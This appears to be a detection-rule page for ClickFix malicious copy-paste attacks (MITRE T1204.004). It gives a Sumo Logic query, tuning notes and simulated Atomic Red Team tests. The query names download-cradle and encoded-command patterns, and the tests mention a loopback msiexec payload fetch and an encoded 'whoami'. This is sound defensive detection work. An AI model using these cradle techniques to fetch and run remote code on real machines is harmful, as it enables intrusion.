Detect Malicious Copy and Paste in Sumo Logic CSE
Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.
MITRE ATT&CK
- Tactic
- Execution
- Technique
- T1204 User Execution
- Sub-technique
- T1204.004 Malicious Copy and Paste
- Canonical reference
- https://attack.mitre.org/techniques/T1204/004/
Sumo Detection Query
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*endpoint*)
| where _raw matches /EventCode=1|EventID.*=.*1|event_simpleName.*ProcessRollup/
| parse regex field=_raw "(?:ParentImage|ParentProcessName)[\":\s=]+(?P<parent_image>[^\"\s<>\n]+)" nodrop
| parse regex field=_raw "(?:^|[\s,\"])(?:Image|ProcessName|process_name)[\":\s=]+(?P<process_image>[^\"\s<>\n]+)" nodrop
| parse regex field=_raw "(?:CommandLine|ProcessCommandLine|command_line)[\":\s=]+(?P<cmdline>[^\n<]{1,2048})" nodrop
| parse regex field=_raw "(?:User|username)[\":\s=]+(?P<username>[^\"\s<>\n]+)" nodrop
| where (
(
parent_image matches /(?i)(\\|\/)explorer\.exe(\"|$|\s)/
AND process_image matches /(?i)(\\|\/)?(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe(\"|$|\s)/
)
OR (
parent_image matches /(?i)(\\|\/)(chrome|firefox|msedge|iexplore|brave)\.exe(\"|$|\s)/
AND process_image matches /(?i)(\\|\/)?(powershell|pwsh|cmd|mshta)\.exe(\"|$|\s)/
)
OR (
process_image matches /(?i)(\\|\/)?(mshta|wscript)\.exe(\"|$|\s)/
AND parent_image matches /(?i)(\\|\/)(explorer|chrome|firefox|msedge|iexplore|brave)\.exe(\"|$|\s)/
)
)
| where cmdline matches /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\s|\bcurl\s|\bwget\s|certutil.*urlcache|bitsadmin.*transfer|-EncodedCommand|-enc\s|FromBase64String|Invoke-Expression|IEX[(\s]|javascript:|vbscript:|msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/
| eval RunDialogExecution = if (parent_image matches /(?i)explorer\.exe/, "true", "false")
| eval BrowserSpawn = if (parent_image matches /(?i)(chrome|firefox|msedge|iexplore|brave)\.exe/, "true", "false")
| eval DownloadCradle = if (cmdline matches /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s)/, "true", "false")
| eval EncodedPayload = if (cmdline matches /(?i)(-EncodedCommand|-enc\s|FromBase64String)/, "true", "false")
| eval InlineScript = if (cmdline matches /(?i)(javascript:|vbscript:)/, "true", "false")
| eval InvokeExpression = if (cmdline matches /(?i)(Invoke-Expression|IEX[(\s])/, "true", "false")
| eval RemoteExec = if (cmdline matches /(?i)(msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/, "true", "false")
| eval ClickFixScore = (if(RunDialogExecution=="true",1,0)) + (if(BrowserSpawn=="true",1,0)) + (if(DownloadCradle=="true",1,0)) + (if(EncodedPayload=="true",1,0)) + (if(InlineScript=="true",1,0)) + (if(InvokeExpression=="true",1,0)) + (if(RemoteExec=="true",1,0))
| fields _messagetime, _sourceHost, username, parent_image, process_image, cmdline, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec, ClickFixScore
| sort by ClickFixScore desc, _messagetime descDetects ClickFix / Malicious Copy-Paste (T1204.004) by parsing Sysmon Process Create (Event ID 1) logs in Sumo Logic. Identifies scripting interpreter processes (PowerShell, cmd, mshta, wscript, cscript) spawned by explorer.exe (Windows Run dialog) or browser processes, where the command line contains download cradle patterns, base64 encoding, Invoke-Expression, or inline javascript:/vbscript: handlers. Scores each event across seven behavioral indicators to surface high-confidence ClickFix intrusions.
Data Sources
Required Tables
False Positives & Tuning
- IT automation workflows where SCCM task sequences or Group Policy scripts trigger PowerShell download cradles through user-context processes, particularly during OS provisioning or patch deployment windows.
- Developer workstations where browser-based IDEs (e.g., GitHub Codespaces local companion, VS Code Live Share browser component) spawn local PowerShell with encoded parameters for workspace synchronization.
- Security testing using Atomic Red Team T1204.004 tests or manual simulation as part of scheduled red team exercises — these will match all behavioral indicators and receive maximum ClickFixScore.
- Help desk macros or IT runbook tools that construct encoded PowerShell commands programmatically and execute them in the user session context, generating high scores without malicious intent.
Other platforms for T1204.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1ClickFix Run Dialog PowerShell Download Cradle Simulation
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.
- Test 2ClickFix mshta Inline JavaScript Execution
Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.
- Test 3ClickFix Base64-Encoded PowerShell via Run Dialog
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.
- Test 4ClickFix msiexec Remote Package Execution
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
References (8)
- https://attack.mitre.org/techniques/T1204/004/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://www.reliaquest.com/blog/using-captcha-for-compromise/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
- https://asec.ahnlab.com/en/73952/
- https://asec.ahnlab.com/en/85699/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.004/T1204.004.md
Unlock Pro Content
Get the full detection package for T1204.004 including response playbook, investigation guide, and atomic red team tests.